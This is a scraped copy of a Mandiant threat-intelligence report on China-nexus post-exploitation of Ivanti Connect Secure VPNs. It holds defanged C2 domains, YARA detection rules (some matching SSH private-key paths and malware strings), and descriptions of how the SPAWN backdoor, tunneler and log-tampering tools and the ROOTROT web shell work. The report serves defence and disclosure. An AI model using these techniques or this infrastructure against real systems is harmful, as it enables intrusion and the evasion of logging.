style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">WARPWIRE Variant C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">pan.xj[.]hk</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">akapush.us[.]to</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER C2 server</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">opra1.oprawh.workers.dev</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BRICKSTORM C2 server</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 5: Network-based indicators</span></p> <h3><span style="vertical-align: baseline;">YARA Rules</span></h3></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Webshell_ROOTROT_1 { meta: author = "Mandiant" description = "This rule detects ROOTROT, a web shell written in Perl that is embedded into a legitimate Pulse Secure .ttc file to enable arbitrary command execution." md5 = "c7ffd2c06e9b7e8e0b7ac92a0dbe3294" strings: $s1 = "use MIME::Base64" ascii $s2 = {6d 79 20 24 61 72 67 3d 64 65 63 6f 64 65 5f 62 61 73 65 36 34 28 22 24 6b 65 79 22 29} $s3 = {24 6f 75 74 70 75 74 20 2e 3d 20 22 3c 21 2d 2d 5c 6e 22 3b} $s4 = {22 3c 2f 62 6f 64 79 3e 5c 6e 5c 6e 3c 2f 68 74 6d 6c 3e 5c 6e 22} condition: filesize < 4KB and all of them } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Backdoor_BRICKSTORM_1 { meta: author = "Mandiant" created = "2024-01-30" md5 = "4645f2f6800bc654d5fa812237896b00" descr = "Hunting rule looking for BRICKSTORM golang backdoor samples" strings: $v1 = "/home/vsphere-ui/vcli" ascii wide $v2 = "/opt/vmware/sbin" ascii wide $v3 = "/opt/vmware/sbin/vami-httpd" ascii wide $s1 = "github.com/gorilla/mux" ascii wide $s2 = "WRITE_LOG=true" ascii wide $s3 = "wssoft" ascii wide condition: uint32(0) == 0x464c457f and filesize < 6MB and 1 of ($v*) and 2 of ($s*) }</code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>import "pe" rule M_APT_Backdoor_Win_PHANTOMNET_1 { meta: author = "Mandiant" md5 = "59f4d38a5caafbc94673c6d488bf37e3" strings: $phantomnet = /\\PhantomNet-\w{1,10}\.pdb/ ascii nocase condition: (uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550) and all of them } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_SLIVER_1 { meta: Author = “Mandiant” description = "Detects Windows, MacOS and ELF variants of the Sliver implant framework" md5 = "5ecd0c38501dfb02b682cec0a2d93aa9" strings: $s1 = ".InvokeSpawnDllReq" $s2 = ".(*InvokeSpawnDllReq).Reset" $s3 = ".(*InvokeSpawnDllReq).ProtoMessage" $s4 = ".(*InvokeSpawnDllReq).ProtoReflect" $s5 = ".(*InvokeSpawnDllReq).Descriptor" $s6 = ".(*InvokeSpawnDllReq).GetData" $s7 = ".(*InvokeSpawnDllReq).GetProcessName" $s8 = ".(*InvokeSpawnDllReq).GetArgs" $s10 = ".(*InvokeSpawnDllReq).GetKill" $s11 = ".(*InvokeSpawnDllReq).GetPPid" $s12 = ".(*InvokeSpawnDllReq).GetProcessArgs" $s13 = ".(*InvokeSpawnDllReq).GetRequest" $s14 = ".(*InvokeSpawnDllReq).String" $s15 = ".(*InvokeSpawnDllReq).GetEntryPoint" condition: ((uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or uint32(0) == 0x464c457f or (uint32(0) == 0xBEBAFECA or uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF or uint32(0) == 0xCEFAEDFE)) and 5 of ($s*) } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Backdoor_TERRIBLETEA_1 { meta: author = "Mandiant" description = "This rule is designed to detect on events related to terribletea. TERRIBLETEA is a backdoor written in Go that communicates over HTTP. Its many capabilities include shell command execution, capturing screens, keystroke logging, port scanning, enumerating files, starting a SOCKS5 proxy and new SSH session, downloading files, and executing SQL queries." md5 = "bb3b286f88728060c80ea65993576ef8" strings: $code_part_of_getcommand = {48 BA 44 61 74 61 31 73 33 6E [1-12] 80 7B ?? 64} $code_get_task = { 48 8D [5] B9 04 00 00 00 48 8B ?? 24 [4] 48 8D [5] 41 B8 03 00 00 00 E8} $func1 = "SendRequest" fullword $func2 ="UploadResult" $func3 ="Online" $func4 ="GetCommond" condition: all of ($code*) and any of ($func*) and filesize<20MB } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_TONERJAM_1 { meta: author = "Mandiant" description = "This rule detects TONERJAM, a launcher that decrypts and executes a shellcode payload stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload." strings: $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8} $p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d} condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and ( ($p00_0 in (17000..28000) and $p00_1 in (3700..14000)) ) } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Installer_SPAWNSNAIL_1 { meta: author = "Mandiant" description = "Detects SPAWNSNAIL. SPAWNSNAIL is an SSH backdoor targeting Ivanti devices. It has an ability to inject a specified binary to other process, running local SSH backdoor when injected to dsmdm process, as well as injecting additional malware to dslogserver" md5 = "e7d24813535f74187db31d4114f607a1" strings: $priv = "PRIVATE KEY-----" ascii fullword $key1 = "%d/id_ed25519" ascii fullword $key2 = "%d/id_ecdsa" ascii fullword $key3 = "%d/id_rsa" ascii fullword $sl1 = "[selinux] enforce" ascii fullword $sl2 = "DSVersion::getReleaseStr()" ascii fullword $ssh1 = "ssh_set_server_callbacks" ascii fullword $ssh2 = "ssh_handle_key_exchange" ascii fullword $ssh3 = "ssh_add_set_channel_callbacks" ascii fullword $ssh4 = "ssh_channel_close" ascii fullword condition: uint32(0) == 0x464c457f and $priv and any of ($key*) and any of ($sl*) and any of ($ssh*) } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Installer_SPAWNANT_1 { meta: author = "Mandiant" description = "Detects SPAWNANT. SPAWNANT is an Installer targeting Ivanti devices. Its purpose is to persistently install other malware from the SPAWN family (SPAWNSNAIL, SPAWNMOLE) as well as drop additional webshells on the box." strings: $s1 = "dspkginstall" ascii fullword $s2 = "vsnprintf" ascii fullword $s3 = "bom_files" ascii fullword $s4 = "do-install" ascii $s5 = "ld.so.preload" ascii $s6 = "LD_PRELOAD" ascii $s7 = "scanner.py" ascii condition: uint32(0) == 0x464c457f and 5 of ($s*) } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Tunneler_SPAWNMOLE_1 { meta: author = "Mandiant" description = "Detects a specific comparisons in SPAWNMOLE tunneler, which allow malware to filter put its own traffic . SPAWNMOLE is a tunneler written in C and compiled as an ELF32 executable. The sample is capable of hijacking a process on the compromised system with a specific name and hooking into its communication capabilities in order to create a proxy server for tunneling traffic." md5 = "4f79c70cce4207d0ad57a339a9c7f43c" strings: /* 3C 16 cmp al, 16h 74 14 jz short loc_5655C038 0F B6 45 C1 movzx eax, [ebp+var_3F] 3C 03 cmp al, 3 74 0C jz short loc_5655C038 0F B6 45 C5 movzx eax, [ebp+var_3B] 3C 01 cmp al, 1 0F 85 ED 00 00 00 jnz loc_5655C125 */ $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2] 3C 01 0F 85 } /* 81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h 0F 85 CD 00 00 00 jnz loc_5655C128 81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h 0F 85 C0 00 00 00 jnz loc_5655C128 */ $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3 1B 0F 85} condition: uint32(0) == 0x464c457f and all of them } </code></pre></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_APT_Utility_SPAWNSLOTH_1 { meta: author = "Mandiant" description = "Detects SPAWNSLOTH. SPAWNSLOTH is an Utility targeting Ivanti devices. Its purpose is to work together with SPAWNSNAIL and block logging via dslogserver process when SPAWNSNAIL backdoor is active." md5 = "4acfc5df7f24c2354384f7449280d9e0" strings: $dslog = "dslogserver" ascii fullword $hook1 = "g_do_syslog_servers_exist" ascii fullword $hook2 = "_ZN5DSLog4File3addEPKci" ascii fullword $hook3 = "funchook_create" ascii fullword condition: uint32(0) == 0x464c457f and all of them } </code></pre></div>
Content
empty
Author
Link
Published date
Image url
Feed url
Guid
Hidden blurb
--- !ruby/object:Feedjira::Parser::RSSEntry entry_id: !ruby/object:Feedjira::Parser::GloballyUniqueIdentifier guid: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement/ categories: - Threat Intelligence title: 'Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies' summary: "<div class=\"block-paragraph_advanced\"><p>Written by: Matt Lin, Austin Larsen, John Wolfram, Ashley Pearson, Josh Murchie, Lukasz Lamparski, Joseph Pisano, Ryan Hall, Ron Craft, Shawn Chew, Billy Wong, Tyler McLellan</p>\n<hr/>\n<p> </p></div>\n<div class=\"block-paragraph_advanced\"><p><span style=\"vertical-align: baseline;\">Since the </span><a href=\"https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">initial disclosure</span></a><span style=\"vertical-align: baseline;\"> of </span><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2023-46805\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">CVE-2023-46805</span></a><span style=\"vertical-align: baseline;\"> and </span><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-21887\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">CVE-2024-21887</span></a><span style=\"vertical-align: baseline;\"> on Jan. 10, 2024, Mandiant has conducted multiple incident response engagements across a range of industry verticals and geographic regions. Mandiant's previous blog post, </span><a href=\"https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence\"><span style=\"text-decoration: underline; vertical-align: baseline;\">Cutting Edge, Part 3: Investigating Ivanti Connect Secure VPN Exploitation and Persistence Attempts</span></a><span style=\"vertical-align: baseline;\">, details zero-day exploitation of CVE-2024-21893 and CVE-2024-21887 by a suspected China-nexus espionage actor that Mandiant tracks as UNC5325. </span></p>\n<p><span style=\"vertical-align: baseline;\">This blog post, as well as our previous reports detailing Ivanti exploitation, help to underscore the different types of activity that Mandiant has observed on vulnerable Ivanti Connect Secure appliances that were unpatched or did not have the appropriate mitigation applied. </span></p>\n<p><span style=\"vertical-align: baseline;\">Mandiant has observed different types of post-exploitation activity across our incident response engagements, including lateral movement supported by the deployment of open-source tooling and custom malware families. In addition, we've seen these suspected China-nexus actors evolve their understanding of Ivanti Connect Secure by abusing appliance-specific functionality to achieve their objectives.</span></p>\n<p><span style=\"vertical-align: baseline;\">As of April 3, 2024, a patch is readily available for every supported version of Ivanti Connect Secure affected by the vulnerabilities. We recommend that customers follow Ivanti's latest </span><a href=\"https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">patching guidance</span></a><span style=\"vertical-align: baseline;\"> and instructions to prevent further exploitation activity. In addition, Ivanti released a </span><a href=\"https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-policy-secure\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">new enhanced external integrity checker tool</span></a><span style=\"vertical-align: baseline;\"> (ICT) to detect potential attempts of malware persistence across factory resets and system upgrades and other tactics, techniques, and procedures (TTPs) observed in the wild. We also released a </span><a href=\"https://services.google.com/fh/files/misc/ivanti-connect-secure-remediation-hardening.pdf\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">remediation and hardening guide</span></a><span style=\"vertical-align: baseline;\">, which includes recommendations.</span></p>\n<p><span style=\"vertical-align: baseline;\">Mandiant recommends customers run both the internal and the latest </span><a href=\"https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">external ICT</span></a><span style=\"vertical-align: baseline;\"> released alongside a </span><a href=\"https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-policy-secure\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">new patch</span></a><span style=\"vertical-align: baseline;\"> on April 3, 2024, as part of a comprehensive defense-in-depth strategy. Mandiant would like to acknowledge Ivanti for their collaboration, transparency, and ongoing support throughout this process.</span></p>\n<h2><span style=\"vertical-align: baseline;\">Clustering and Attribution</span></h2>\n<p><span style=\"vertical-align: baseline;\">Mandiant is tracking multiple clusters of activity exploiting CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893 across our incident response investigations.</span><span style=\"vertical-align: baseline;\"> In addition to suspected China-nexus espionage groups, Mandiant has also identified financially motivated actors exploiting </span><span style=\"vertical-align: baseline;\">CVE-2023-46805 and CVE-2024-21887</span><span style=\"vertical-align: baseline;\">, likely to enable operations such as crypto-mining. </span><span style=\"vertical-align: baseline;\">Since the public disclosure on Jan. 10, 2024, Mandiant has observed eight distinct clusters involved in the exploitation of one or more of these Ivanti CVEs. Of these, we are highlighting five China-nexus clusters that have conducted intrusions. </span></p>\n<p><span style=\"vertical-align: baseline;\">In February 2024, Mandiant identified a cluster of activity tracked as UNC5291, which we assess with medium confidence to be Volt Typhoon, targeting U.S. energy and defense sectors. The UNC5291 campaign targeted Citrix Netscaler ADC in December 2023 and probed Ivanti Connect Secure appliances in mid-January 2024, however Mandiant has not directly observed Volt Typhoon successfully compromise Ivanti Connect Secure.</span></p>\n<h3><span style=\"vertical-align: baseline;\">UNC5221</span></h3>\n<p><a href=\"https://advantage.mandiant.com/actors/threat-actor--b797832d-0411-5574-b7cf-c51b22e08423\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">UNC5221</span></a><span style=\"vertical-align: baseline;\"> is a suspected China-nexus actor that Mandiant is tracking as the only group exploiting CVE-2023-46805 and CVE-2024-21887 during the pre-disclosure time frame since early Dec. 2023. As stated in our </span><a href=\"https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-zero-day-exploitation\"><span style=\"text-decoration: underline; vertical-align: baseline;\">previous blog post</span></a><span style=\"vertical-align: baseline;\">, UNC5221 also conducted widespread exploitation of CVE-2023-46805 and CVE-2024-21887 following the public disclosure on Jan. 10, 2024.</span></p>\n<h3><span style=\"vertical-align: baseline;\">UNC5266</span></h3>\n<p><span style=\"vertical-align: baseline;\">Mandiant created UNC5266 to track post-disclosure exploitation leading to deployment of Bishop Fox's SLIVER implant framework, a WARPWIRE variant, and a new malware family that Mandiant has named TERRIBLETEA. At this time, based on observed infrastructure usage similarities, Mandiant suspects with moderate confidence that UNC5266 overlaps in part with UNC3569, a China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments. </span></p>\n<h3><span style=\"vertical-align: baseline;\">UNC5330</span></h3>\n<p><span style=\"vertical-align: baseline;\">UNC5330 is a suspected China-nexus espionage actor. UNC5330 has been observed chaining CVE-2024-21893 and CVE-2024-21887 to compromise Ivanti Connect Secure VPN appliances as early as Feb. 2024. Post-compromise activity by UNC5330 includes deployment of PHANTOMNET and TONERJAM. UNC5330 has employed Windows Management Instrumentation (WMI) to perform reconnaissance, move laterally, manipulate registry entries, and establish persistence.</span></p>\n<p><span style=\"vertical-align: baseline;\">Mandiant observed UNC5330 operating a server since Dec. 6, 2021, which the group used as a GOST proxy to help facilitate malicious tool deployment to endpoints. The default certificate for GOST proxy was observed from Sept. 1, 2022 through Jan. 1, 2024. UNC5330 also attempted to download Fast Reverse Proxy (FRP) from this server on Feb. 3, 2024, from a compromised Ivanti Connect Secure device. Given the SSH key reuse in conjunction with the temporal proximity of these events, Mandiant assesses with moderate confidence UNC5330 has been operating through this server since at least 2021. </span></p>\n<h3><span style=\"vertical-align: baseline;\">UNC5337</span></h3>\n<p><span style=\"vertical-align: baseline;\">UNC5337 is a suspected China-nexus espionage actor that compromised Ivanti Connect Secure VPN appliances as early as Jan. 2024. UNC5337 is suspected to exploit CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (command injection) for infecting Ivanti Connect Secure appliances. UNC5337 leveraged multiple custom malware families including the SPAWNSNAIL passive backdoor, SPAWNMOLE tunneler, SPAWNANT installer, and SPAWNSLOTH log tampering utility. Mandiant suspects with medium confidence that UNC5337 is UNC5221. </span></p>\n<h3><span style=\"vertical-align: baseline;\">UNC5291</span></h3>\n<p><span style=\"vertical-align: baseline;\">UNC5291 is a cluster of targeted probing activity that we assess with moderate confidence is associated with UNC3236, also known publicly as Volt Typhoon. Activity for this cluster started in December 2023 focusing on Citrix Netscaler ADC and then shifted to focus on Ivanti Connect Secure devices after details were made public in mid-Jan. 2024. Probing has been observed against the academic, energy, defense, and health sectors, which aligns with past Volt Typhoon interest in critical infrastructure. In Feb. 2024, the Cybersecurity and Infrastructure Security Agency (CISA) released an advisory warning that </span><a href=\"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">Volt Typhoon was targeting critical infrastructure</span></a><span style=\"vertical-align: baseline;\"> and was potentially interested in Ivanti Connect Secure devices for initial access.</span></p>\n<h2><span style=\"vertical-align: baseline;\">New TTPs and Malware</span></h2>\n<p><span style=\"vertical-align: baseline;\">Since our last blog on Ivanti exploitation, Mandiant has identified additional TTPs used by threat actors to gain access to target environments and move laterally within them. Additionally, Mandiant has identified several new code families leveraged by threat actors following the exploitation of Ivanti Connect Secure appliances. Of these code families, several are assessed to be custom malware families; however, Mandiant has also identified the use of open-source tooling, such as SLIVER and CrackMapExec.</span></p>\n<h3><span style=\"vertical-align: baseline;\">SPAWN Malware Family</span></h3>\n<p><span style=\"vertical-align: baseline;\">During analysis of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant discovered four distinct malware families that work closely together to create a stealthy and persistent backdoor on an infected appliance. Mandiant assesses that these malware families are designed to enable long-term access and avoid detection. </span></p>\n<p><span style=\"vertical-align: baseline;\">Figure 1 illustrates how the SPAWN malware family operates.</span></p></div>\n<div class=\"block-image_full_width\">\n\n\n\n\n\n\n \ \n <div class=\"article-module h-c-page\">\n <div class=\"h-c-grid\">\n \ \n\n <figure class=\"article-image--large\n \n \n h-c-grid__col\n \ h-c-grid__col--6 h-c-grid__col--offset-3\n \n \n \"\n \ >\n\n \n \n \n <img\n src=\"https://storage.googleapis.com/gweb-cloudblog-publish/images/cutting-edge4-fig1.max-1000x1000.png\"\n \ \n alt=\"SPAWN malware family diagram\">\n \n </a>\n \ \n <figcaption class=\"article-image__caption \"><p data-block-key=\"hrsqd\">Figure 1: SPAWN malware family diagram</p></figcaption>\n \n </figure>\n\n \n \ </div>\n </div>\n \n\n\n\n\n</div>\n<div class=\"block-paragraph_advanced\"><h4><span style=\"vertical-align: baseline;\">SPAWNANT</span></h4>\n<p><span style=\"vertical-align: baseline;\">SPAWNANT</span><strong style=\"vertical-align: baseline;\"> </strong><span style=\"vertical-align: baseline;\">is an installer that leverages a coreboot installer function to establish persistence for the SPAWNMOLE tunneler and SPAWNSNAIL backdoor. It hijacks a legitimate </span><code style=\"vertical-align: baseline;\">dspkginstall</code><span style=\"vertical-align: baseline;\"> installer process and exports an </span><code style=\"vertical-align: baseline;\">sprintf</code><span style=\"vertical-align: baseline;\"> function adding a malicious code to it before redirecting a flow back to </span><code style=\"vertical-align: baseline;\">vsnprintf</code><span style=\"vertical-align: baseline;\">.</span></p>\n<h4><span style=\"vertical-align: baseline;\">SPAWNMOLE</span></h4>\n<p><span style=\"vertical-align: baseline;\">SPAWNMOLE is a tunneler that injects into the </span><code style=\"vertical-align: baseline;\">web</code><span style=\"vertical-align: baseline;\"> process. It hijacks the </span><code style=\"vertical-align: baseline;\">accept</code><span style=\"vertical-align: baseline;\"> function in the </span><code style=\"vertical-align: baseline;\">web</code><span style=\"vertical-align: baseline;\"> process to monitor traffic and filter out malicious traffic originating from the attacker. The remainder of the benign traffic is passed unmodified to the legitimate web server functions. The malicious traffic is tunneled to a host provided by an attacker in the buffer. Mandiant assesses the attacker would most likely pass a local port where SPAWNSNAIL is operating to access the backdoor.</span></p>\n<ul>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">The malware attempts to inject itself into a process named </span><code style=\"vertical-align: baseline;\">web</code><span style=\"vertical-align: baseline;\">.</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">The malware attempts to hijack the </span><code style=\"vertical-align: baseline;\">accept</code><span style=\"vertical-align: baseline;\"> API from the </span><code style=\"vertical-align: baseline;\">libc</code><span style=\"vertical-align: baseline;\"> binary within </span><code style=\"vertical-align: baseline;\">web</code><span style=\"vertical-align: baseline;\"> process.</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">The malware is specifically compiled as a PIE (Position Independent Executable) in order to use a third-party library for injection.</span></p>\n</li>\n<li aria-level=\"1\" style=\"list-style-type: disc; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">The malware traffic must start with a header that contains </span><span style=\"vertical-align: baseline;\">0xfb49e3e2</span><span style=\"vertical-align: baseline;\"> at offset </span><span style=\"vertical-align: baseline;\">0x13</span><span style=\"vertical-align: baseline;\"> and </span><code style=\"vertical-align: baseline;\">0x1bc38361</code><span style=\"vertical-align: baseline;\"> at offset </span><code style=\"vertical-align: baseline;\">0x1b</code><span style=\"vertical-align: baseline;\"> of the received buffer.</span></p>\n</li>\n</ul>\n<h4><span style=\"vertical-align: baseline;\">SPAWNSNAIL</span></h4>\n<p><span style=\"vertical-align: baseline;\">SPAWNSNAIL (</span><code style=\"vertical-align: baseline;\">libdsmeeting.so</code><span style=\"vertical-align: baseline;\">) is a backdoor that listens on localhost. It is designed to run by injecting into the </span><code style=\"vertical-align: baseline;\">dsmdm</code><span style=\"vertical-align: baseline;\"> process (process responsible for supporting mobile device management features). It creates a backdoor by exposing a limited SSH server on localhost port 8300. We assess that the attacker uses the SPAWNMOLE tunneler to interact with SPAWNSNAIL.</span></p>\n<p><span style=\"vertical-align: baseline;\">SPAWNSNAIL's second purpose is to inject SPAWNSLOTH (</span><code style=\"vertical-align: baseline;\">.liblogblock.so</code><span style=\"vertical-align: baseline;\">) into </span><code style=\"vertical-align: baseline;\">dslogserver</code><span style=\"vertical-align: baseline;\">, a process supporting event logging on Connect Secure.</span></p>\n<p><span style=\"vertical-align: baseline;\">SPAWNSNAIL checks if its binary name is </span><code style=\"vertical-align: baseline;\">dsmdm</code><span style=\"vertical-align: baseline;\">; if it is running under that name, it creates two threads:</span></p>\n<ol>\n<li aria-level=\"1\" style=\"list-style-type: decimal; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">First thread drops a hard-coded SSH host private key to </span><code style=\"vertical-align: baseline;\">/tmp/.dskey</code><span style=\"vertical-align: baseline;\">, configures </span><code style=\"vertical-align: baseline;\">libssh</code><span style=\"vertical-align: baseline;\"> to use the key, and then deletes </span><code style=\"vertical-align: baseline;\">/tmp/.dskey</code><span style=\"vertical-align: baseline;\">. The malware binds to localhost on port 8300.</span></p>\n</li>\n<ol>\n<li aria-level=\"2\" style=\"list-style-type: lower-alpha; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">The SSH server requires public key authentication.</span></p>\n</li>\n<li aria-level=\"2\" style=\"list-style-type: lower-alpha; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">When starting an interactive shell session, the malware prints a banner with statistics about the system. It will print the information about the release, uptime, current time, and whether SELinux is enabled. SPAWNSNAIL then executes an interactive </span><code style=\"vertical-align: baseline;\">bash</code><span style=\"vertical-align: baseline;\"> shell.</span></p>\n</li>\n</ol>\n<li aria-level=\"1\" style=\"list-style-type: decimal; vertical-align: baseline;\">\n<p role=\"presentation\"><span style=\"vertical-align: baseline;\">The second thread injects a log tampering utility, SPAWNSLOTH (</span><code style=\"vertical-align: baseline;\">/tmp/.liblogblock.so</code><span style=\"vertical-align: baseline;\">), into the </span><code style=\"vertical-align: baseline;\">dslogserver</code><span style=\"vertical-align: baseline;\"> process up to three times.</span></p>\n</li>\n</ol>\n<h4><span style=\"vertical-align: baseline;\">SPAWNSLOTH</span></h4>\n<p><span style=\"vertical-align: baseline;\">SPAWNSLOTH is a log tampering utility injected into the </span><code style=\"vertical-align: baseline;\">dslogserver</code><span style=\"vertical-align: baseline;\"> process. It can disable logging and disable log forwarding to an external syslog server when the SPAWNSNAIL backdoor is operating.</span></p>\n<p><span style=\"vertical-align: baseline;\">SPAWNSLOTH uses </span><a href=\"https://github.com/kubo/funchook\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">funchook</span></a><span style=\"vertical-align: baseline;\"> to hook the </span><code style=\"vertical-align: baseline;\">_ZN5DSLog4File3addEPKci</code><span style=\"vertical-align: baseline;\"> function (it is assumed to be a logging function of </span><code style=\"vertical-align: baseline;\">dslogserver</code><span style=\"vertical-align: baseline;\">). It also modifies the </span><code style=\"vertical-align: baseline;\">g_do_syslog_servers_exist_p</code><span style=\"vertical-align: baseline;\"> symbol. This is a pointer to a global variable controlling if event logs should be forwarded to an external syslog server.</span></p>\n<p><span style=\"vertical-align: baseline;\">Finally, it uses interprocess communication via shared memory to communicate with the SPAWNSNAIL backdoor. SPAWNSLOTH only blocks logging when SPAWNSNAIL is running.</span></p>\n<h3><span style=\"vertical-align: baseline;\">Getting to the Root of It</span></h3>\n<p><span style=\"vertical-align: baseline;\">During the investigation of an Ivanti Connect Secure appliance compromised by UNC5221, Mandiant identified a new web shell we are tracking as ROOTROT. ROOTROT is a web shell written in Perl embedded into a legitimate Connect Secure </span><code style=\"vertical-align: baseline;\">.ttc</code><span style=\"vertical-align: baseline;\"> file located at </span><code style=\"vertical-align: baseline;\">/data/runtime/tmp/tt/setcookie.thtml.ttc</code><span style=\"vertical-align: baseline;\"> by exploiting CVE-2023-46805 and CVE-2024-21887. </span><code style=\"vertical-align: baseline;\">setcookie.thtml.ttc</code><span style=\"vertical-align: baseline;\"> is located on a writable partition on the appliance, and the same file was abused in previous Pulse Connect Secure exploitation events involving </span><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2019-11539\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">CVE-2019-11539</span></a><span style=\"vertical-align: baseline;\"> and </span><a href=\"https://nvd.nist.gov/vuln/detail/CVE-2020-8218\" rel=\"noopener\" target=\"_blank\"><span style=\"text-decoration: underline; vertical-align: baseline;\">CVE-2020-8218</span></a><span style=\"vertical-align: baseline;\">.</span></p>\n<p><span style=\"vertical-align: baseline;\">Figure 2 shows the code inserted into the </span><code style=\"vertical-align: baseline;\">setcookie.thmtl.ttc</code><span style=\"vertical-align: baseline;\"> file that contains ROOTROT. The web shell can be accessed at </span><code style=\"vertical-align: baseline;\">/dana-na/auth/setcookie.cgi</code><span style=\"vertical-align: baseline;\">. It parses the issued decoded Base64-encoded command and executes it with </span><code style=\"vertical-align: baseline;\">eval</code><span style=\"vertical-align: baseline;\">. </span></p></div>\n<div class=\"block-paragraph_advanced\"><pre class=\"language-plain\"><code> \ $output .= \"</body>\\n\\n</html>\\n\";\n 